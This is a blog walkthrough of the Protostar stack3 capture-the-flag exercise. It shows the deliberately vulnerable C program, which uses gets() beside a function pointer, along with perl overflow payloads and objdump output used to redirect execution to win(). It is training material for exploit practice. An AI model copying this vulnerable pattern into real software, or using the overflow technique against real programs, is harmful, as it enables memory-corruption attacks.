Month: June 2015

Protostar exploits stack3

On By MuttiIn ctfLeave a comment

Introduction

Protostar exploits are a cool bunch of ctf type exercises that focus on Linux  binary exploits that progressively get harder. A ISO containing the OS and challenges can be downloaded.

The website with all information and downloads is at https://exploit-exercises.com/protostar/

Challenge

Test run

user@protostar:~$ /opt/protostar/bin/stack3

Exploit

Make the program respond with the message “code flow successfully changed”.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
 printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
 volatile int (*fp)();
 char buffer[64];

 fp = 0;

 gets(buffer);

 if(fp) {
 printf("calling function pointer, jumping to 0x%08x\n", fp);
 fp();
 }
}

We can see the challenge statement will be displayed if we can change the flow of the code such that the pointer value for *fp() can be changed to the memory location of win().

First of we have to use the same trick from previous challenges and corrupt the memory stack and using stdin to overflow the variable “buffer” which gets filled using gets().

Let’s see if we can crash the program

user@protostar:~$ perl -e 'print "A"x65'|/opt/protostar/bin/stack3
calling function pointer, jumping to 0x00000041
Segmentation fault

It appears that our data of A’s (0x41) was able to overwrite fp.

In order to fill fp with the memory location of win() we need to examine the program using objdump (this hint is on the protostar site).

user@protostar:~$ objdump -d /opt/protostar/bin/stack3 |grep -A 10 win
08048424 <win>:
 8048424: 55                   push   %ebp
 8048425: 89 e5                mov    %esp,%ebp
 8048427: 83 ec 18             sub    $0x18,%esp
 804842a: c7 04 24 40 85 04 08 movl   $0x8048540,(%esp)
 8048431: e8 2a ff ff ff       call   8048360 <puts@plt>
 8048436: c9                   leave 
 8048437: c3                   ret

After issuing objdump and greping for win() we can see the memory location is “08048424”.

Let’s overfill fp in reverse byte order with “0x24840408”

user@protostar:~$ perl -e 'print "A"x64 . "\x24\x84\x04\x08"'|/opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

Thank you